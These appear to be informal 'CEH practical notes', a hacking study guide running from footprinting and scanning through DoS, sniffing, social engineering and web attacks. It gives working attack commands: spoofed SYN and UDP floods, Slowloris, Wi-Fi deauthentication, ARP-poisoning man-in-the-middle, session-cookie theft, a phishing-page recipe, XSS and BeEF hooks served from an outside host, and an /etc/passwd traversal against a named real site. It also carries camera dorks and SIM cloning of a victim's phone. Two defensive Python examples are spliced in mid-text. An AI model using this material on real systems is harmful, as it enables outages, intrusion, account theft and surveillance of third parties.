Hacking in Shadows by Raghav Bisht
Root-X Security
Haxa-1 NullLambda:X
12/31/2014
Root-X, Shadow Walker & Raghav
Hacking In Shadow CEH Practical Notes
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
CONTENT
Foot-printing
Scanning/Banner Grabbing
Enumeration
Google Hacking
Information Gathering [Automated Process ]
Dos Attack D-Dos Attacks
IDS - IPS - Firewall - Antivirus - Honey-pots
Mobile Hacking
Sniffing
Social Engineering
Web-servers & Web-application Hacking
System Hacking
Malwares
Penetration testing
Buffer Overflow
Wi-Fi Hacking
FOOTPRINTING
1. Whois database: domaintools.com, yougetsignal.com, Sam Spade [ whois tool ], Net-Tools 5 [ networking tools ], robtex.com
2. Important sites: archive.org
3. Mirroring websites: httrack, IDM --> Grabber
4. Reverse IP lookup: yougetsignal.com, robtex.com
5. ping, netstat, nslookup, tracert (CMD commands)
ping
    ping google.com
    ping -t google.com          [ ping until stopped with ctrl+c ]
    ping -l 1024 google.com     [ payload size in bytes ]
    ping -n 10 google.com       [ number of echo requests ]
netstat
    netstat
    netstat -a                  [ all connections and listening ports ]
    netstat -n -o -a            [ numeric addresses, with the owning process ID ]
nslookup
    nslookup www.site.com
tracert
    tracert www.site.com
6. Email Harvesting
Tools: samspade, black widow, GSA Email Spider, Email Extractor
Metasploit [ Backtrack , Kali Linux ]
    msfconsole
    search gather                                [ lists all information-gathering modules ]
    use auxiliary/gather/search_email_collector
    set DOMAIN <domain name>
    exploit                                      [ runs the module; "run" also works for auxiliary modules ]
SCANNING & BANNER GRABBING
1. Network Scanning: IP scanning, port scanning
Eg. IP scanning first. For IP scanning we use (check it out: http://120.59.128.29):
I. Angry IP Scanner : 0.0.0.0-255.255.255.255, using the concept of a ping sweep. So let's start:
Our target : 120.59.128.1 - 120.59.128.255
On ports : 80,21,443,110
Let's try to open this IP on port 80 -> it shows an ADSL modem. To bypass this modem we try a brute-force or dictionary attack.
Eg. Top ten passwords :
admin
user
custom
manager
abc123
abc@123
password
pa55w0rd
Pa55w0Rd
admin@123
123456
passwd
admin123
user123
II. Nmap/Zenmap
III. Port Scanner
IV. Network scan ( netdiscover [ BT tool ] ) :
netdiscover -i <interface> -r <target>/24      [ /24 or /16 <--- subnet ]
netdiscover -i eth0 -r 192.168.1.0/24
2. Vulnerability scanning
I ] Vulnerability scanners (Acunetix, Netsparker, Nessus, GFI LANguard etc.) and Backtrack tools:
WhatWeb [ identifies the web application and its technologies ] [ Backtrack tool ]
    Eg: ./whatweb bytec0de.com
joomscan [ scans Joomla websites ] [ /pentest/web/joomscan ]
    Eg: ./joomscan.pl -u http://liclanka.com/
Nikto :
    Eg: ./nikto.pl -host liclanka.com
Websecurify
    application/backtrack/exploitation tool/web exploitation tool/websecurify
Vega
    application/backtrack/vulnerability assessment/web application/web vulnerability scanner/vega
w3af
    application/backtrack/vulnerability assessment/web application/web vulnerability scanner/w3af
webshag
    pentest/enumeration/web/webshag [ ./webshag_gui.py ]
3. Nmap
Types of scans :
TYPE                              || COMMAND
1. TCP full connect scan          ----> nmap -sT <target name>
2. SYN half-open scan             ----> nmap -sS <target name>
3. Stealth scans                  ----> used for bypassing firewalls
   Xmas scan                      ----> nmap -sX <target name>
   Null scan                      ----> nmap -sN <target name>
   FIN scan                       ----> nmap -sF <target name>
4. List scan                      ----> nmap -sL <target range>   [ -iL list.txt reads targets from a file ]
5. UDP scan                       ----> nmap -sU <target name>
6. Ping scan                      ----> nmap -sn <target name>    [ -sP is the older spelling ]
7. ACK scan                       ----> nmap -sA <target name>
8. Window scan                    ----> nmap -sW <target name>
9. Version scan                   ----> nmap -sV <target name>    [ -v only raises verbosity ]
10. Timing                        ----> T1,T2,T3 -----> slower, deeper (less noisy) scanning
                                        T4,T5 -------> aggressive timing scanning
11. Quick scan                    ----> nmap -F <target name>
12. Intense scan                  ----> nmap -T4 -A -v <target name>
13. Intense scan + UDP            ----> nmap -sS -sU -T4 -A -v <target name>
14. Intense scan, all TCP ports   ----> nmap -p 1-65535 -T4 -A -v <target name>
15. Intense scan, no ping         ----> nmap -T4 -A -v -Pn <target name>
16. Quick scan plus               ----> nmap -sV -T4 -O -F --version-light <target name>
17. Quick traceroute              ----> nmap -sn --traceroute <target name>
18. Slow comprehensive scan       ----> nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" <target>
ENUMERATION
I. Enumerate users [ to take out details about users, like NetBIOS names, user names etc. ]
DNS Enumeration
robtex.com
1. dnsenum (BT)
    cd /pentest/enumeration/dns/dnsenum
    ./dnsenum.pl <target>
    ./dnsenum.pl bytecode.in
2. dnsmap (BT)
    cd /pentest/enumeration/dns/dnsmap
    ./dnsmap bytecode.in
3. dnsrecon (BT)
    cd /pentest/enumeration/dns/dnsrecon
    ./dnsrecon.py -d bytecode.in
4. dnswalk (BT)
    cd /pentest/enumeration/dns/dnswalk
    ./dnswalk bytecode.in.       <--- put a dot at the end (fully qualified name)
5. dnstracer (BT)
    dnstracer -v bytecode.com
6. dig (BT)
    dig
    dig A <target>     -> A record (IPv4 address)
    dig AAAA <target>  -> AAAA record (IPv6 address)
    dig MX <target>    -> MX (mail exchange) record
    dig NS <target>    -> name server records
    dig SOA <target>   -> start of authority record
    dig SRV <target>   -> service records
7. fierce.pl (BT)
    fierce.pl -dns bytecode.in
8. nslookup (BT)
    BT ~ # nslookup
    > www.checkpoint.com
    > set type=mx        [ MX records ]
    > checkpoint.com
    > set type=ns        [ NS records ]
    > checkpoint.com
9. Automating lookups
    Forward lookup brute force
    Reverse lookup brute force
    Zone transfers
Web Crawling -> [ admin page finding ]
    IDM
    HTTRACK
    Any vulnerability scanner
Nmap
Shared folders [ MyLanViewer ]
NetBIOS Service
1. Scanning for the NetBIOS service
    SMB4K (BT) [GUI]
    smbserverscan (BT) [GUI]
2. Enumerating usernames
    samrdump (BT)
    BT smb-enum # ./samrdump.py 192.168.90.18
GOOGLE HACKING
1. http://www.googleguide.com/advanced_operators_reference.html
2. Basic search
3. Advanced search
4. Directory listing
    intitle:index of parent directory
5. Locating CGI-BIN [ Common Gateway Interface ]
    inurl:/cgi-bin/login.cgi
6. Traffic camera hacking
    inurl:indexFrame Camera
    allinurl:"view/index" filetype:shtml
== Axis ==
inurl:"view/indexFrame.shtml"
inurl:"view/index.shtml"
intitle:"Live View / - AXIS"
intitle:axis camera
intitle:"axis #Kameramodell#"
== Canon ==
inurl:sample/LvAppl/
== JVC ==
intitle:"V.Networks [Motion Picture(Java)"
== EvoCam ==
intitle:"EvoCam" inurl:"webcam.html"
== WebcamXP ==
intitle:"my webcamXP server!"
== MOBOTIX ==
inurl:/control/userimage.html
== Panasonic ==
inurl:/ViewerFrame?Mode=Motion
== FlexWatch ==
inurl:toolam.html
inurl:viewash.html
== Toshiba ==
intitle:"TOSHIBA Network Camera - User Login"
== Sony ==
inurl:/home/homeJ.html
inurl:/view.shtml
intitle:"Live View / - AXIS" | inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera"
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
site:.viewnetcam.com -www.viewnetcam.com
INFORMATION GATHERING [ Automated Process ]
1] Information gathering :
    > Uberharvest
    > theharvester.py
    > metagoofil
    > Web data extractors ( email / phone-number extractors )
    > Maltego
2] People search :
    > pipl.com
    > anywho.com
    > address.com
    > Social networking sites [ facebook, linkedin, twitter ]
    > Job sites [ dice.com, monster.com, naukri.com ]
3] Phone number :
    > truecaller.com
    > kgdetective.com
    > phunwa.com
4] Traceroute tools :
    > Trout [ www.foundstone.com ]
    > tracert , traceroute [ commands ]
5] Email IP tracking :
    > http://blasze.tk
    > wspy.org
    > Emailtrackerpro.com
    > Readnotify.com
    > Politemail.com
    > www.whatismyip.com
    > http://www.iptrackeronline.com
DoS ATTACK & DDoS ATTACKS
1. DoS ATTACK
It is an attempt to make a machine or network resource unavailable to its intended users, by consuming all the resources available to a user: network bandwidth, all types of memory etc.
Ping of Death
    ping -t -l 6550 google.com [ max buffer size = 65500 ]
    ping bytecode.in -l 1460 -n 10000000 -w 1
    Affected systems [ Solaris 2.4 , ninix , Win 3.11, 95 ]
SYN ATTACK
    hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood
    [ -S -> SYN flag; -p 22 -> the open ssh port; --flood -> send as fast as possible; -a 192.168.1.254 -> spoofed source address, so the SYN flood lands on the router; 192.168.1.38 -> victim address ]
UDP/HTTP/TCP Flooding
    LOIC
    HOIC
Smurf Attack
    make your own packet and flood the network
    pktbuilder
    packETH 1.6 [ linux & windows ]
CDP Flooding [ Cisco Discovery Protocol ]
    yersinia [ backtrack ]
    Done on Cisco switches & routers
MAC Flooding [ BT ]
    Flooding network switches
ARP Spoofing
    NetCut [ Windows ]
    ettercap [ Backtrack ]
Deauthentication Technique
    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
Where:
    -0   : means deauthentication
    1    : is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
    -a   : MAC address of the access point ( router )
    -c   : MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
    ath0 : is the interface name
2. DDoS ATTACK
HTTP attack
    GET / POST methods
DNS amplification attack
NTP amplification attack
Slowloris attack [ used when the firewall blocks your IP address after some requests ] [ slowloris.pl ]
    slowloris.pl -dns www.site.com -timeout 1 -cache
3. IPv6 flooding : [ RA flood attack ]
Victim : Windows user
    Advertising the IPv6 network [ ./fake_router6 eth1 def:c0::/64 ]
    cd /pentest/spoofing/thc-ipv6
    Now flooding [ ./flood_router6 eth1 ]
4. Scapy [ packet manipulation tool ] Features -> capture, create, replay, scan, discover.
I. scapy -> sending a packet from scapy
    send(IP(src="192.168.1.55",dst="192.168.1.1")/ICMP()/"OurPayload")   -> check with wireshark
    ctrl+d
II. scapy -> creating our packet & sending it
    L2=Ether()
    L3=IP()
    L4=TCP()
    L2.show()
    L2=Ether(src="01:23:45:67:89:ab")
    L3=IP(ttl=99, dst="192.168.1.1")
    del(L3.dst)                                   -> back to the default destination
    L3.dst="192.168.1.2"
    L4=TCP(sport=6783, dport=22, flags="A")       -> the field is "flags", not "flag"
    L4.show()
    sendp(L2/L3/L4)                               -> send the packet at layer 2
III. scapy -> sniffing with scapy
    sniff(iface="eth0", prn=lambda x:x.show())    -> show full packet detail
    ctrl+c
    sniff(iface="eth0", prn=lambda x:x.summary()) -> one-line summary instead of full detail
    sniff(filter="host 192.168.1.1", count=5)
    a=_                                           -> keep the last result
    a.nsummary()
    a[1]
5. Hping3 [ port scanning, SYN, ACK, IP, other host discovery, sniffer, flooding, file transfer ]
    hping3 -h "or" man hping3 [ help menu ]
    hping3 -S www.lpu.in -p 80 -c 2 [ -S -> SYN request, -c -> how many packets to send ]
    hping3 -S 192.168.1.38 -p ++50 -c 5 [ ++50 -> port starts at 50 and increments: 50,51,52,53,... ]
    hping3 -1 192.168.1.x --rand-dest -I eth0 [ -1 -> ICMP; ping all possible IP addresses in random order ]
    hping3 -1 192.168.1.1 --icmp-ts -c 2 [ check the ICMP timestamp ]
    hping3 -8 50-56 -S 8.8.8.8 [ -8 -> scan mode, 50-56 -> ports, 8.8.8.8 -> google DNS server ]
    hping3 -2 192.168.1.6 -p 80 -c 1 [ -2 -> UDP ]
    hping3 -F -P -U 192.168.1.38 -c 3 [ -F -> FIN, -P -> PUSH, -U -> URGENT ] [ Xmas scan ]
    hping3 192.168.1.38 -Q -p 139 -S [ -Q -> show sequence numbers ]
    hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [ -S -> SYN, -p 22 -> open ssh port, -a -> spoofed source address (the router), 192.168.1.38 -> victim address ]
    hping3 --rand-source targetIPaddress --flood -S -L 0 -p 80
    hping3 -2 www.lpu.in -p ++44444 -T -n [ traceroute using UDP ] [ ctrl+z if it doesn't respond ]
    hping3 -S www.lpu.in -p 53 -T [ traceroute using TCP ]
NOTE : hping3 also works as a packet-scripting interpreter, similar to scapy.
    hping3
    hping send "ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"
6. CDP Flooding [ Cisco Discovery Protocol ] [ exhausts the CPU of routers & switches ]
    yersinia -G
    Launch attack -> CDP -> flood CDP table -> OK
    List attacks -> cancel all attacks
7. HTTP flood attack: ApacheBench [ tool, BT ]
    ab -c 1000 -n 10000 http://youripaddress/
8. UDP flood attack
    hping3 --flood --rand-source --udp -p 53 YourtargetIPaddress
9. SYN flood attack
    hping3 --rand-source targetIPaddress --flood -S -L 0 -p 80
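The SYN floods above (hping3 -S --flood, with or without --rand-source) leave a recognisable shape on the wire: a burst of SYNs toward one service with almost no handshakes completing, and with --rand-source one SYN per never-seen source. This added example (not from the original notes) scores per-service traffic the way a detector would; the packet records, thresholds and field names are assumptions constructed for illustration.

```python
"""Flag a SYN flood from TCP packet records, as a defender's detector.

Added example, not part of the original notes. Packet records, thresholds
and the (dst, dport) service key are assumptions made for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float      # capture time in seconds
    src: str       # source IP
    dst: str       # destination IP
    dport: int     # destination TCP port
    flags: str     # TCP flag letters as hping/Wireshark show them: "S", "SA", "A", ...


def is_syn_only(p):
    """A client SYN: SYN set, ACK clear (first packet of the handshake)."""
    return "S" in p.flags and "A" not in p.flags


def peak_rate(timestamps, window):
    """Largest number of events inside any sliding window of `window` seconds."""
    timestamps = sorted(timestamps)
    best, left = 0, 0
    for right, ts in enumerate(timestamps):
        while ts - timestamps[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def syn_flood_report(packets, window=1.0, min_syns=100, max_completion=0.2):
    """Score every (dst, dport) service seen in `packets`.

    A service is flagged when at least `min_syns` client SYNs arrived inside
    some `window`-second interval and at most `max_completion` of the SYN
    sources ever sent the third-handshake ACK. A spoofed --rand-source flood
    also shows distinct_sources ~= syns (one SYN per fake address).
    """
    by_service = defaultdict(list)
    for p in packets:
        by_service[(p.dst, p.dport)].append(p)

    report = {}
    for service, pkts in by_service.items():
        syns = [p for p in pkts if is_syn_only(p)]
        acked_sources = {p.src for p in pkts if p.flags == "A"}
        completed = sum(1 for p in syns if p.src in acked_sources)
        completion = completed / len(syns) if syns else 1.0
        peak = peak_rate([p.ts for p in syns], window)
        report[service] = {
            "syns": len(syns),
            "distinct_sources": len({p.src for p in syns}),
            "peak_syns_per_window": peak,
            "completion_ratio": round(completion, 3),
            "flagged": peak >= min_syns and completion <= max_completion,
        }
    return report


def build_sample():
    """Constructed traffic (not a real capture):
    - three browsers completing handshakes to 192.168.1.50:80
    - one legitimate ssh client to 192.168.1.38:22
    - 150 spoofed sources each sending one SYN to 192.168.1.38:22 within
      0.75 s, the shape of `hping3 --rand-source -S --flood -p 22`
    """
    pkts = []
    for i, client in enumerate(("192.168.1.10", "192.168.1.11", "192.168.1.12")):
        pkts.append(Pkt(0.1 * i, client, "192.168.1.50", 80, "S"))
        pkts.append(Pkt(0.1 * i + 0.02, client, "192.168.1.50", 80, "A"))
    pkts.append(Pkt(1.0, "192.168.1.10", "192.168.1.38", 22, "S"))
    pkts.append(Pkt(1.02, "192.168.1.10", "192.168.1.38", 22, "A"))
    for i in range(150):
        spoofed = f"10.{(i >> 8) & 255}.{i & 255}.{(7 * i) % 250 + 1}"
        pkts.append(Pkt(5.0 + 0.005 * i, spoofed, "192.168.1.38", 22, "S"))
    return pkts


if __name__ == "__main__":
    for service, stats in syn_flood_report(build_sample()).items():
        print(service, stats)
```

On real traffic the same function can be fed from a pcap reader; the thresholds should be tuned to the service's normal SYN rate rather than left at these illustrative values.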
NOTE : slowloris.pl
IDS - IPS - FIREWALL - ANTIVIRUS - HONEYPOTS
1. Firewall
I. Windows Firewall [ netsh ]
    netsh /?
    netsh lan /?
    netsh> help
    netsh> firewall
    netsh firewall> help
    netsh firewall set portopening tcp 445 smb enable   --> to open a port on my system
TCP/IP troubleshooting and interface resets :
    Install the TCP/IP protocol   - netsh int ipv4 install
    Uninstall the TCP/IP protocol - netsh int ipv4 uninstall
Configure the Windows Advanced Firewall :
    Show all firewall rules
        netsh advfirewall firewall show rule name=all
    Delete an inbound advanced firewall rule for port 21
        netsh advfirewall firewall delete rule name=all dir=in protocol=tcp localport=21
    Export Windows Advanced Firewall settings
        netsh advfirewall export "c:\advfirewall.wfw"
Perhaps the most common command you might use is the command to enable or disable your Windows firewall, like this:
    netsh firewall set opmode disable
    netsh firewall set opmode enable
1. To deny all incoming connections and allow all outgoing connections :
    netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound
2. To enable the firewall:
    netsh advfirewall set allprofiles state on
    netsh firewall set opmode enable
3. To disable the firewall:
    netsh advfirewall set allprofiles state off
    netsh firewall set opmode disable
4. Allow or deny rules
To add a rule allowing TCP or UDP incoming packets on port 80:
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN
    netsh advfirewall firewall add rule name="HTTP" protocol=UDP localport=80 action=allow dir=IN
To deny TCP or UDP packets on port 80:
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN
    netsh advfirewall firewall add rule name="HTTP" protocol=UDP localport=80 action=block dir=IN
5. Delete a rule
To delete a rule issue the following command:
    netsh advfirewall firewall delete rule name="HTTP"
6. Allow or deny incoming connections for a specific port and IP
To allow from a specific IP:
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x
To deny from a specific IP:
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x
Allow or deny a subnet
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24
or
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x
or
    netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet
II. Linux Firewall [ iptables ]
IP address blocking
    iptables -A INPUT -s <Ip Address> -j DROP
    iptables -A INPUT -s <Ip Address> -p tcp --destination-port 80 -j DROP
    iptables -A INPUT -s <Ip Address> -p tcp --destination-port 443 -j DROP
    sudo ufw deny from <Ip Address>
IP address allowing
    iptables -D INPUT -s <Ip Address> -j DROP      [ removes the DROP rule added above ]
    sudo ufw allow from <Ip Address>
2. Honeypot
    Net Tools
    Hack Trapper
Honeybot
Port Scan Attack Detector
MOBILE HACKING
1. SIM Cloning
SIM  - Subscriber Identity Module
IMSI - International Mobile Subscriber Identity
IMEI - International Mobile Station Equipment Identity
ESN  - Electronic Serial Number
MIN  - Mobile Identification Number
CDMA SIM cloning :
1. check for USB drivers
2. attach USB
3. check for the port: "right click on My Computer > Manage > Device Manager > Ports"
4. open CDMA Workshop 2.7.0, set the port, press Read [ all details of the phone will be saved ]
5. give the victim's phone back to him.
7. attach Reliance Netconnect (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-iid-449181852)
   > http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/
8. again see the port.
9. open CDMA Workshop v2.7.0 --> set port
10. write all SIM details to the ZTE MG-880 data card
2. Android Rooting
Useful apps :
    FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons
    Root Explorer v3.1.7 for Android 2.3 & 3.0+
    SD Maid Pro v3.0.2.8 ROOT + Unlocker
    SuperSU v1.93 + SuperSU Pro Key
    Lucky Patcher v4.3.1.apk
    SRSRoot v4.7 Android SRS Root
    SuperSU v1.93
    Root.Explorer.v2.7
    SuperSU Pro Key v1.00 ROOT FULL Android
How to root your... HTC One (M8)
    Unlock your bootloader via HTCdev.com
    Download and install TWRP for the M8 from http://teamw.in/project/twrp2/225
    Flash the SuperSU root zip from http://forum.xda-developers.com/showthread.php?t=1538053
Samsung Galaxy S5
    Download the Odin flash utility from http://forum.xda-developers.com/showthread.php?t=2189539
    Download the CF-Auto-Root package from http://forum.xda-developers.com/showthread.php?t=2696537
    Extract the TAR file from the CF-Auto-Root zip. Select the TAR file as type PDA in Odin, and flash with your device in download mode (power on with home and volume down held)
Sony Xperia Z2
    Unlock the bootloader of your device: http://forum.xda-developers.com/showthread.php?t=2440597
    Download ClockworkMod Recovery from http://forum.xda-developers.com/showthread.php?t=2702001 and flash using fastboot
    Reboot to recovery and flash the SuperSU root zip from http://forum.xda-developers.com/showthread.php?t=1538053
3. Jailbreaking iOS (Apple)
Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch (Guide)
STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*
STEP 2: Download your iOS 7.x.x from our download page.
STEP 3: Make sure to back up all the data on your iPhone using iTunes or iCloud before using the Evasi0n7 untethered jailbreak.
STEP 4: Launch Evasi0n7 and plug your device into the computer, then click on the "Jailbreak" button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.
STEP 7: After it is done, an Evasi0n7 app will appear on your iPhone's home screen. Tap on it.
STEP 8: Your device will be rebooted again.
STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone several times until the jailbreak is done.
STEP 10: And you are ready to go.
SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html
Supported devices : For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with the one-click Evasi0n7 jailbreak tool.
Jailbreak devices:
    iPhone 5s
    iPhone 5c
    iPhone 5
    iPhone 4S
    iPhone 4
    iPad 2
    iPad 3
    iPad 4
    iPad Air
    iPad mini
    iPad mini 2
    iPod touch 5
4. Smartphone Pentest Framework Master Link : https://github.com/georgiaw/Smartphone-Pentest-Framework
SNIFFING
1. Man In The Middle Attack using Ettercap
Tools : 1] wireshark
        2] ettercap
        3] Cain & Abel
1] Ettercap:
    > vi /etc/etter.conf
    > Put : ec_uid = 0
    > Put : ec_gid = 0
    > In the linux section, enable the iptables redirect rules ( remove the # )
    > ettercap -G [ to open ettercap in graphical mode ]
    > Sniff / Unified sniffing / choose interface
    > Hosts / Scan for hosts / Host list
    > add the router IP to target 1 & the rest (the victims) to target 2
    > MITM / ARP poisoning
    > Start sniffing
2] Wireshark:
    > open wireshark
    > start sniffing
    > Filter protocols [ http,ftp,smtp etc ] => http://wiki.wireshark.org/DisplayFilters
    > http.request.method == "POST"                              [ submitted forms, e.g. logins ]
    > tcp.port eq 25 or icmp
    > ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16          [ traffic between two private-range hosts ]
    > tcp.window_size == 0 && tcp.flags.reset != 1               [ zero-window conditions that are not resets ]
    > smb || nbns || dcerpc || nbss || dns
    > ip.addr == 10.43.54.65
    > ip.addr != 10.43.54.65
NOTE : Analyzing traffic using Wireshark
Step1 : Open Wireshark
Step2 : Choose Interface and Start Sniffing
Step3 : Filtering Protocols
Step4 : Follow the tcp stream
Step5: Check the Header
3. Man In The Middle Attack using xplico :
Tools needed: 1. Ettercap
              2. Xplico
Victim info :
    Victim  -> 192.168.1.21
    arp -a  -> aa-aa-aa-aa-aa-aa
    gateway -> 192.168.1.1
apt-get update
apt-get upgrade
1. ettercap -G
    > Sniff
    > Unified sniffing
    > select interface
    > Hosts
    > Scan for hosts
    > Host list
    > default gateway: add to target 1
    > .21 <victim>: add to target 2
    > MITM
    > ARP poisoning
    > OK
2. In a terminal -> enable IP forwarding: # echo 1 > /proc/sys/net/ipv4/ip_forward
3. Backtrack > Forensics > Network Forensics > xplico web gui
    > http://localhost:9876/
    > u : xplico  p : xplico
    > Case
    > Live acquisition
    > case name : anything > Create
    > click on your case, e.g. anything
    > New Session
    > session name : xyz
    > click on session xyz
    > At Live :
    > Interface
    > lo, eth0, wlan0 ...etc
NOTE : While the victim uses the network, all of its sessions are saved by xplico.
4. driftnet -i eth0
5. Session Hijacking [ tokens = 128-256 bit; AES cipher ]
1. Cookies > wireshark filter : http.cookie contains "datr"
           > http.cookie && ip.src==<Target ip> -----> check for : 1012 GET / HTTP/1.1
2. <SCRIPT>alert(document.cookie);</SCRIPT> [ XSS vulnerability ]
3. Fiddler
Step 1 : Open Fiddler
Step 2 : Tick the HTTPS decryption check box
Step 3 : Capture your victim's traffic
Step 4 : Take out your victim's cookies
Step 5 : The attacker replaces their own cookies with them, using the Cookies Editor add-on on Firefox.
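Both hijacking paths above (reading the cookie off the wire with the http.cookie filter, or via document.cookie from an XSS) are closed by attributes on the Set-Cookie header rather than by the token itself. This added example (not from the original notes) audits a Set-Cookie value for those attributes and builds a hardened one; the sample header values are constructed, and the minimum token length is an assumption.

```python
"""Audit and build session cookies against sniffing and document.cookie theft.

Added example, not part of the original notes. The Set-Cookie values below
are constructed; MIN_TOKEN_CHARS is an assumption for the length check.
"""
import secrets
from http.cookies import SimpleCookie

MIN_TOKEN_CHARS = 22  # 128 bits in url-safe base64; assumption for this check


def audit_set_cookie(header_value):
    """Return the weaknesses in one Set-Cookie header value, empty if none.

    - no Secure   -> the cookie travels in clear HTTP, where the http.cookie
                     Wireshark filter from the notes picks it up
    - no HttpOnly -> readable through document.cookie, i.e. the XSS payload
    - no SameSite -> attached to cross-site requests as well
    - short value -> too small to be a 128-256 bit random session token
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()

    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        problems.append("SameSite not Lax/Strict")
    if len(value.strip('"')) < MIN_TOKEN_CHARS:
        problems.append(f"token for {name!r} shorter than {MIN_TOKEN_CHARS} chars")
    return problems


def hardened_session_cookie(name="sid"):
    """Build a Set-Cookie value: 256-bit random token plus all three flags."""
    jar = SimpleCookie()
    jar[name] = secrets.token_urlsafe(32)   # 32 random bytes -> 43 url-safe chars
    jar[name]["secure"] = True
    jar[name]["httponly"] = True
    jar[name]["samesite"] = "Strict"
    jar[name]["path"] = "/"
    return jar[name].OutputString()


# constructed: what a sniffed PHP session cookie often looks like
WEAK_EXAMPLE = "PHPSESSID=abc123; path=/"

if __name__ == "__main__":
    print(audit_set_cookie(WEAK_EXAMPLE))
    print(hardened_session_cookie())
```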
SOCIAL ENGINEERING
1. Human based
2. Computer based
1. Human based :
    > There is no patch for human stupidity.
    > Social engineering is the human side of breaking into a corporate network.
    1. Posing as a legitimate end user > gives an identity and asks for the sensitive information.
    2. Posing as an important user > as a VIP, CFO, CEO etc.
    3. Posing as technical support > calls as technical support staff and requests an ID & password.
    4. Eavesdropping > unauthorized listening to conversations or reading of messages.
    5. Shoulder surfing > looking over your shoulder as you enter a password.
    6. Dumpster diving > searching for sensitive information in the target company's:
        > trash bins
        > printer trash bins
        > sticky notes
        > phone bills
        > contact information
        > financial information
    7. Tailgating > an unauthorized person, wearing a fake ID badge, enters a secured area by closely following an authorized person through a door requiring key access.
    8. Piggybacking > "I forgot my ID badge at home. Please help me."
2. Computer based social engineering :
    > Mail / attachments
    > Trojans
    > Keyloggers
    > Pop-up windows
    > Phishing
    > Hoaxes and chain letters
    > Websites / sweepstakes
    > Spam mails
Eg. Phishing
Step 1 : Creating a fake Facebook page.
Step 2 : Save this page's source code in Notepad
Step 3 : Find " login.php?login_attempt=1 "
2. Tabnabbing
WEB SERVERS & WEB APPLICATION HACKING
1] SQL Injection
2] Exploiting hidden elements [ tool : Web Developer add-on ] > to manipulate HTML elements, tags, forms etc. on a website.
    > Eg: woodlandworldwide.com [ vulnerable site ]
3] PHP disclosure > look for a vulnerable site like
    [ http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=main ]
    > now [ http://hrithikrules.com/displayArt.php?fname=index.php ]
4] XSS [ Cross Site Scripting ] [ put a JS query into search boxes, URLs etc. ]
    > http://www.hrithikrules.com/ [ put the JS into its search box; it will redirect you ]
    > <script>alert("hacked")</script>
    --------> BeEF [ tool ] [ Backtrack ] [ start the server, attach your link to your XSS iframe script and send it to another user on the LAN ]
    --------> Download BeEF -> upload it to a free hosting site -> get your link -> attach it to the XSS ---> send it anywhere in the world.
    > <script iframe src=http://www.world4free.in></script>
4.1] XSS Shell
5] LFI / RFI [ file inclusion ] [ tool : wAppEx ]
    > http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research.txt&dirname=main
    > http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/passwd
6] DNN Portal Hacking
7] Shell uploading > do SQL injection first to find the admin password for the server.
    > now open the website and find any page which uploads something [ multimedia uploading ]
